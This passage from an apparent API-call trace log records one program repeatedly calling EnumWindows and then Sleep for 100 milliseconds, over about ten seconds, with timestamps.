(dwMilliseconds=0x64) [0208.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.781] Sleep (dwMilliseconds=0x64) [0208.800] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.801] Sleep (dwMilliseconds=0x64) [0208.809] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.810] Sleep (dwMilliseconds=0x64) [0208.843] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.843] Sleep (dwMilliseconds=0x64) [0208.906] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.907] Sleep (dwMilliseconds=0x64) [0208.924] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.924] Sleep (dwMilliseconds=0x64) [0208.939] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.940] Sleep (dwMilliseconds=0x64) [0208.965] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.969] Sleep (dwMilliseconds=0x64) [0209.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.015] Sleep (dwMilliseconds=0x64) [0209.059] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.063] Sleep (dwMilliseconds=0x64) [0209.115] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.117] Sleep (dwMilliseconds=0x64) [0209.122] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.122] Sleep (dwMilliseconds=0x64) [0209.137] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.141] Sleep (dwMilliseconds=0x64) [0209.187] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.188] Sleep (dwMilliseconds=0x64) [0209.225] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.229] Sleep (dwMilliseconds=0x64) [0209.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.231] Sleep (dwMilliseconds=0x64) [0209.249] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.250] Sleep (dwMilliseconds=0x64) [0209.296] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.297] Sleep (dwMilliseconds=0x64) [0209.317] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.318] Sleep (dwMilliseconds=0x64) [0209.324] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.325] Sleep (dwMilliseconds=0x64) [0209.358] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.359] Sleep (dwMilliseconds=0x64) [0209.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.529] Sleep (dwMilliseconds=0x64) [0209.554] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.555] Sleep (dwMilliseconds=0x64) [0209.638] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.639] Sleep (dwMilliseconds=0x64) [0209.685] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.686] Sleep (dwMilliseconds=0x64) [0209.731] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.732] Sleep (dwMilliseconds=0x64) [0209.795] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.796] Sleep (dwMilliseconds=0x64) [0209.941] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0209.942] Sleep (dwMilliseconds=0x64) [0210.021] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.022] Sleep (dwMilliseconds=0x64) [0210.064] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.065] Sleep (dwMilliseconds=0x64) [0210.117] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.118] Sleep (dwMilliseconds=0x64) [0210.159] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.160] Sleep (dwMilliseconds=0x64) [0210.172] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.172] Sleep (dwMilliseconds=0x64) [0210.212] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.213] Sleep (dwMilliseconds=0x64) [0210.253] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.253] Sleep (dwMilliseconds=0x64) [0210.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.263] Sleep (dwMilliseconds=0x64) [0210.309] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.310] Sleep (dwMilliseconds=0x64) [0210.330] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.331] Sleep (dwMilliseconds=0x64) [0210.340] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.341] Sleep (dwMilliseconds=0x64) [0210.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.356] Sleep (dwMilliseconds=0x64) [0210.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.404] Sleep (dwMilliseconds=0x64) [0210.449] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.450] Sleep (dwMilliseconds=0x64) [0210.484] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.485] Sleep (dwMilliseconds=0x64) [0210.497] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.498] Sleep (dwMilliseconds=0x64) [0210.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.544] Sleep (dwMilliseconds=0x64) [0210.573] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.574] Sleep (dwMilliseconds=0x64) [0210.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.591] Sleep (dwMilliseconds=0x64) [0210.638] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.639] Sleep (dwMilliseconds=0x64) [0210.684] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.685] Sleep (dwMilliseconds=0x64) [0210.721] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.721] Sleep (dwMilliseconds=0x64) [0210.731] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.732] Sleep (dwMilliseconds=0x64) [0210.981] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0210.982] Sleep (dwMilliseconds=0x64) [0211.057] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.058] Sleep (dwMilliseconds=0x64) [0211.116] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.120] Sleep (dwMilliseconds=0x64) [0211.147] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.151] Sleep (dwMilliseconds=0x64) [0211.168] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.172] Sleep (dwMilliseconds=0x64) [0211.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.219] Sleep (dwMilliseconds=0x64) [0211.240] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.241] Sleep (dwMilliseconds=0x64) [0211.246] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.247] Sleep (dwMilliseconds=0x64) [0211.267] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.268] Sleep (dwMilliseconds=0x64) [0211.333] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.335] Sleep (dwMilliseconds=0x64) [0211.383] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.384] Sleep (dwMilliseconds=0x64) [0211.390] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.391] Sleep (dwMilliseconds=0x64) [0211.437] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.438] Sleep (dwMilliseconds=0x64) [0211.485] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.486] Sleep (dwMilliseconds=0x64) [0211.507] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.508] Sleep (dwMilliseconds=0x64) [0211.529] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.530] Sleep (dwMilliseconds=0x64) [0211.575] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.576] Sleep (dwMilliseconds=0x64) [0211.597] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.598] Sleep (dwMilliseconds=0x64) [0211.605] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.606] Sleep (dwMilliseconds=0x64) [0211.621] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.622] Sleep (dwMilliseconds=0x64) [0211.668] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.669] Sleep (dwMilliseconds=0x64) [0211.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.716] Sleep (dwMilliseconds=0x64) [0211.747] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.748] Sleep (dwMilliseconds=0x64) [0211.763] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.764] Sleep (dwMilliseconds=0x64) [0211.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.779] Sleep (dwMilliseconds=0x64) [0211.824] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.825] Sleep (dwMilliseconds=0x64) [0211.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.873] Sleep (dwMilliseconds=0x64) [0211.933] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.935] Sleep (dwMilliseconds=0x64) [0211.952] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0211.953] Sleep (dwMilliseconds=0x64) [0212.001] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.002] Sleep (dwMilliseconds=0x64) [0212.034] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.035] Sleep (dwMilliseconds=0x64) [0212.046] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.047] Sleep (dwMilliseconds=0x64) [0212.059] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.060] Sleep (dwMilliseconds=0x64) [0212.123] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.124] Sleep (dwMilliseconds=0x64) [0212.166] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.167] Sleep (dwMilliseconds=0x64) [0212.184] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.189] Sleep (dwMilliseconds=0x64) [0212.234] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.235] Sleep (dwMilliseconds=0x64) [0212.278] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.282] Sleep (dwMilliseconds=0x64) [0212.343] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.344] Sleep (dwMilliseconds=0x64) [0212.381] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.381] Sleep (dwMilliseconds=0x64) [0212.387] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.388] Sleep (dwMilliseconds=0x64) [0212.452] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.453] Sleep (dwMilliseconds=0x64) [0212.480] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.486] Sleep (dwMilliseconds=0x64) [0212.496] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.500] Sleep (dwMilliseconds=0x64) [0212.547] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.548] Sleep (dwMilliseconds=0x64) [0212.584] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.589] Sleep (dwMilliseconds=0x64) [0212.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.591] Sleep (dwMilliseconds=0x64) [0212.609] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.610] Sleep (dwMilliseconds=0x64) [0212.657] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.658] Sleep (dwMilliseconds=0x64) [0212.692] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.693] Sleep (dwMilliseconds=0x64) [0212.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.701] Sleep (dwMilliseconds=0x64) [0212.718] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.719] Sleep (dwMilliseconds=0x64) [0212.766] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.768] Sleep (dwMilliseconds=0x64) [0212.807] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.807] Sleep (dwMilliseconds=0x64) [0212.990] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0212.991] Sleep (dwMilliseconds=0x64) [0213.092] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.093] Sleep (dwMilliseconds=0x64) [0213.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.232] Sleep (dwMilliseconds=0x64) [0213.251] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.252] Sleep (dwMilliseconds=0x64) [0213.329] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.330] Sleep (dwMilliseconds=0x64) [0213.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.357] Sleep (dwMilliseconds=0x64) [0213.372] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.376] Sleep (dwMilliseconds=0x64) [0213.421] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.423] Sleep (dwMilliseconds=0x64) [0213.454] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.455] Sleep (dwMilliseconds=0x64) [0213.465] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.466] Sleep (dwMilliseconds=0x64) [0213.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.485] Sleep (dwMilliseconds=0x64) [0213.530] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.531] Sleep (dwMilliseconds=0x64) [0213.575] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.576] Sleep (dwMilliseconds=0x64) [0213.626] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.627] Sleep (dwMilliseconds=0x64) [0213.675] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.676] Sleep (dwMilliseconds=0x64) [0213.691] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.691] Sleep (dwMilliseconds=0x64) [0213.699] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.700] Sleep (dwMilliseconds=0x64) [0213.735] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.736] Sleep (dwMilliseconds=0x64) [0213.780] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.781] Sleep (dwMilliseconds=0x64) [0213.825] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.826] Sleep (dwMilliseconds=0x64) [0213.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.873] Sleep (dwMilliseconds=0x64) [0213.966] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0213.967] Sleep (dwMilliseconds=0x64) [0214.013] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.014] Sleep (dwMilliseconds=0x64) [0214.076] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.077] Sleep (dwMilliseconds=0x64) [0214.125] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.126] Sleep (dwMilliseconds=0x64) [0214.140] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.141] Sleep (dwMilliseconds=0x64) [0214.188] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.189] Sleep (dwMilliseconds=0x64) [0214.233] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.233] Sleep (dwMilliseconds=0x64) [0214.278] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.284] Sleep (dwMilliseconds=0x64) [0214.435] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.437] Sleep (dwMilliseconds=0x64) [0214.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.485] Sleep (dwMilliseconds=0x64) [0214.531] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.532] Sleep (dwMilliseconds=0x64) [0214.593] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.594] Sleep (dwMilliseconds=0x64) [0214.639] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.640] Sleep (dwMilliseconds=0x64) [0214.656] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.657] Sleep (dwMilliseconds=0x64) [0214.704] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.705] Sleep (dwMilliseconds=0x64) [0214.747] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.748] Sleep (dwMilliseconds=0x64) [0214.801] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.803] Sleep (dwMilliseconds=0x64) [0214.861] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.862] Sleep (dwMilliseconds=0x64) [0214.888] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.889] Sleep (dwMilliseconds=0x64) [0214.952] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0214.953] Sleep (dwMilliseconds=0x64) [0215.000] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.001] Sleep (dwMilliseconds=0x64) [0215.063] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.064] Sleep (dwMilliseconds=0x64) [0215.151] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.152] Sleep (dwMilliseconds=0x64) [0215.206] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.207] Sleep (dwMilliseconds=0x64) [0215.250] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.251] Sleep (dwMilliseconds=0x64) [0215.307] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.307] Sleep (dwMilliseconds=0x64) [0215.374] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.375] Sleep (dwMilliseconds=0x64) [0215.425] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.426] Sleep (dwMilliseconds=0x64) [0215.434] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.438] Sleep (dwMilliseconds=0x64) [0215.484] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.485] Sleep (dwMilliseconds=0x64) [0215.567] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.571] Sleep (dwMilliseconds=0x64) [0215.574] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.575] Sleep (dwMilliseconds=0x64) [0215.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.591] Sleep (dwMilliseconds=0x64) [0215.640] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.641] Sleep (dwMilliseconds=0x64) [0215.657] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.657] Sleep (dwMilliseconds=0x64) [0215.670] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.674] Sleep (dwMilliseconds=0x64) [0215.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.717] Sleep (dwMilliseconds=0x64) [0215.781] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.782] Sleep (dwMilliseconds=0x64) [0215.805] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.806] Sleep (dwMilliseconds=0x64) [0215.825] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.828] Sleep (dwMilliseconds=0x64) [0215.871] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.875] Sleep (dwMilliseconds=0x64) [0215.894] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.895] Sleep (dwMilliseconds=0x64) [0215.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.904] Sleep (dwMilliseconds=0x64) [0215.963] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0215.964] Sleep (dwMilliseconds=0x64) [0216.003] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.004] Sleep (dwMilliseconds=0x64) [0216.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.013] Sleep (dwMilliseconds=0x64) [0216.059] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.060] Sleep (dwMilliseconds=0x64) [0216.086] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.087] Sleep (dwMilliseconds=0x64) [0216.090] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.091] Sleep (dwMilliseconds=0x64) [0216.117] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.118] Sleep (dwMilliseconds=0x64) [0216.153] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.154] Sleep (dwMilliseconds=0x64) [0216.192] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.193] Sleep (dwMilliseconds=0x64) [0216.202] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.203] Sleep (dwMilliseconds=0x64) [0216.215] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.216] Sleep (dwMilliseconds=0x64) [0216.265] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.266] Sleep (dwMilliseconds=0x64) [0216.289] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.289] Sleep (dwMilliseconds=0x64) [0216.294] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.294] Sleep (dwMilliseconds=0x64) [0216.313] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.314] Sleep (dwMilliseconds=0x64) [0216.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.360] Sleep (dwMilliseconds=0x64) [0216.392] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.394] Sleep (dwMilliseconds=0x64) [0216.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.403] Sleep (dwMilliseconds=0x64) [0216.418] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.419] Sleep (dwMilliseconds=0x64) [0216.465] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.466] Sleep (dwMilliseconds=0x64) [0216.512] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.514] Sleep (dwMilliseconds=0x64) [0216.547] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.548] Sleep (dwMilliseconds=0x64) [0216.559] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.560] Sleep (dwMilliseconds=0x64) [0216.574] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.575] Sleep (dwMilliseconds=0x64) [0216.623] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.623] Sleep (dwMilliseconds=0x64) [0216.668] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.669] Sleep (dwMilliseconds=0x64) [0216.763] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.764] Sleep (dwMilliseconds=0x64) [0216.809] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.810] Sleep (dwMilliseconds=0x64) [0216.845] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.846] Sleep (dwMilliseconds=0x64) [0216.856] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.857] Sleep (dwMilliseconds=0x64) [0216.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.904] Sleep (dwMilliseconds=0x64) [0216.935] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.937] Sleep (dwMilliseconds=0x64) [0216.949] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.950] Sleep (dwMilliseconds=0x64) [0216.966] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0216.967] Sleep (dwMilliseconds=0x64) [0217.045] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.046] Sleep (dwMilliseconds=0x64) [0217.060] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.061] Sleep (dwMilliseconds=0x64) [0217.075] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.075] Sleep (dwMilliseconds=0x64) [0217.112] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.113] Sleep (dwMilliseconds=0x64) [0217.155] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.156] Sleep (dwMilliseconds=0x64) [0217.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.219] Sleep (dwMilliseconds=0x64) [0217.265] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.266] Sleep (dwMilliseconds=0x64) [0217.283] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.283] Sleep (dwMilliseconds=0x64) [0217.296] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.296] Sleep (dwMilliseconds=0x64) [0217.327] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.328] Sleep (dwMilliseconds=0x64) [0217.374] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.375] Sleep (dwMilliseconds=0x64) [0217.418] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.419] Sleep (dwMilliseconds=0x64) [0217.468] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.469] Sleep (dwMilliseconds=0x64) [0217.515] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.516] Sleep (dwMilliseconds=0x64) [0217.563] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.564] Sleep (dwMilliseconds=0x64) [0217.581] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.581] Sleep (dwMilliseconds=0x64) [0217.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.591] Sleep (dwMilliseconds=0x64) [0217.626] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.627] Sleep (dwMilliseconds=0x64) [0217.669] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.670] Sleep (dwMilliseconds=0x64) [0217.690] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.690] Sleep (dwMilliseconds=0x64) [0217.702] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.702] Sleep (dwMilliseconds=0x64) [0217.734] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.735] Sleep (dwMilliseconds=0x64) [0217.796] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.797] Sleep (dwMilliseconds=0x64) [0217.809] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.810] Sleep (dwMilliseconds=0x64) [0217.858] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.859] Sleep (dwMilliseconds=0x64) [0217.904] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.905] Sleep (dwMilliseconds=0x64) [0217.922] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.923] Sleep (dwMilliseconds=0x64) [0217.968] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.969] Sleep (dwMilliseconds=0x64) [0217.995] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0217.996] Sleep (dwMilliseconds=0x64) [0218.069] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.070] Sleep (dwMilliseconds=0x64) [0218.116] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.117] Sleep (dwMilliseconds=0x64) [0218.183] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.232] Sleep (dwMilliseconds=0x64) [0218.247] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.250] Sleep (dwMilliseconds=0x64) [0218.295] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.296] Sleep (dwMilliseconds=0x64) [0218.321] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.322] Sleep (dwMilliseconds=0x64) [0218.340] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.343] Sleep (dwMilliseconds=0x64) [0218.389] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.390] Sleep (dwMilliseconds=0x64) [0218.436] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.437] Sleep (dwMilliseconds=0x64) [0218.486] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) 